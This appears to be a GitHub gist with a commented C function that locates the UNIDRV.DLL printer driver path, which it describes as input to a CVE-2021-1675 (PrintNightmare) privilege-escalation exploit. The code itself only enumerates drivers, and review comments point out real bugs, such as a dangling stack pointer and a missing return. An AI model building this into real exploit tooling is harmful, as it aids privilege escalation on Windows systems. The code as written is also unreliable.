@hlldz
Last active January 26, 2022 12:39
DLL Path Finder for CVE-2021-1675 (LPE)
// Returns the DLL path; that value can be used in the exploit.
// Example return value: C:\WINDOWS\System32\DriverStore\FileRepository\ntprint.inf_amd64_xxxxxxxxxxxxxxxx\Amd64\UNIDRV.DLL
//
// What the code does: enumerates the installed printer drivers (DRIVER_INFO_2
// records), picks the first one whose driver path contains "ntprint.inf_amd64",
// replaces the file name in that path with UNIDRV.DLL, and returns the result
// if fileExists() accepts it. The only spooler interaction in this function is
// the read-only EnumPrinterDrivers enumeration.
//
// Returns 0 (null) when the enumeration buffer cannot be allocated.
//
// NOTE(review): the success path returns the address of the automatic array
// targetDLLPath; that storage ends with this call, so the caller receives a
// dangling pointer and reading through it is undefined behaviour.
// NOTE(review): when no driver matches, control reaches the closing brace of a
// non-void function without a return statement, so the caller gets an
// indeterminate value instead of a null pointer.
wchar_t* findDLLPath() {
// Zero-initialised once here and never cleared again (see the wcscat_s note below).
wchar_t targetDLLPath[MAX_PATH] = { 0 };
// dwNeeded and dwReturned have no initialiser; they hold defined values only
// if the EnumPrinterDrivers calls below write to them.
DWORD dwNeeded;
LPBYTE lpDriverInfo;
DWORD dwReturned;
DRIVER_INFO_2* pInfo;
DWORD i;
// Size query: a NULL buffer of length 0 asks the spooler for the number of
// bytes required, reported through dwNeeded. The return value is ignored.
EnumPrinterDriversW(NULL, NULL, 2, NULL, 0, &dwNeeded, &dwReturned);
// LPTR requests fixed, zero-initialised memory.
lpDriverInfo = (LPBYTE)LocalAlloc(LPTR, dwNeeded);
if (lpDriverInfo == NULL) {
return 0;
}
// NOTE(review): this call uses the TCHAR macro name while the size query above
// uses the explicit W variant; the two agree only in a UNICODE build, and the
// wide-string calls below also assume that - confirm the build settings.
// NOTE(review): the result is not checked; if the call fails, the loop below
// runs on whatever dwReturned and the zeroed buffer happen to contain.
EnumPrinterDrivers(NULL, NULL, 2, lpDriverInfo, dwNeeded, &dwNeeded, &dwReturned);
pInfo = (DRIVER_INFO_2*)lpDriverInfo;
for (i = 0; i < dwReturned; i++) {
// Substring match on the driver path, so any path containing this text qualifies.
if (wcsstr(pInfo->pDriverPath, L"ntprint.inf_amd64")) {
wchar_t tempDrive1[_MAX_DRIVE] = { 0 };
wchar_t tempDirectory1[_MAX_DIR] = { 0 };
wchar_t tempFileName1[_MAX_FNAME] = { 0 };
wchar_t tempFileExtension1[_MAX_EXT] = { 0 };
// Split the driver path into drive, directory, file name and extension.
// Only drive and directory are used afterwards; the return code is not checked.
_wsplitpath_s(pInfo->pDriverPath, &tempDrive1[0], _MAX_DRIVE, &tempDirectory1[0], _MAX_DIR, &tempFileName1[0], _MAX_FNAME, &tempFileExtension1[0], _MAX_EXT);
wchar_t* targetDLLName = (LPWSTR)L"UNIDRV.DLL";
// Build <drive><directory>UNIDRV.DLL by appending to targetDLLPath.
// NOTE(review): targetDLLPath is not reset per iteration, so a second matching
// driver is appended after the text left by a first match that failed
// fileExists(); the wcscat_s return codes are not checked either.
wcscat_s(targetDLLPath, MAX_PATH, tempDrive1);
wcscat_s(targetDLLPath, MAX_PATH, tempDirectory1);
wcscat_s(targetDLLPath, MAX_PATH, targetDLLName);
// fileExists() is defined outside this listing; presumably it tests that the
// path names an existing file - verify against its definition.
if (fileExists(targetDLLPath)) {
LocalFree(lpDriverInfo);
// Returns a pointer into this function's own stack frame (see header note).
return targetDLLPath;
}
}
// Advance to the next DRIVER_INFO_2 record in the enumeration buffer.
pInfo++;
}
LocalFree(lpDriverInfo);
// No return statement on this path (see header note).
}